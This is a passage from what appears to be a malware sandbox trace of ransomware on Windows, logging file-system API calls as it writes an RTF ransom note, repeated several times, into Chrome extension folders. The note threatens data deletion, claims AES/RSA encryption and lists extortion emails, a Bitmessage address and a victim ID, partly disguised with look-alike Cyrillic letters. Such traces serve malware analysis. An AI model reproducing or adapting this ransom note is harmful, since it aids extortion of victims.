ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nª\x7fRò%\x95ðeJMôÑ£|Ïú·\x9bâ(oa°³\x18", lpUsedDefaultChar=0x0) returned 8717 [0289.119] WriteFile (in: hFile=0x2d4, lpBuffer=0x2373e98*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2373e98*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.153] CloseHandle (hObject=0x2d4) returned 1 [0289.153] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\#readme_eman#.rtf")) returned 0xffffffff [0289.153] GetLastError () returned 0x2 [0289.158] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.158] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.159] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.164] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235fca8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. 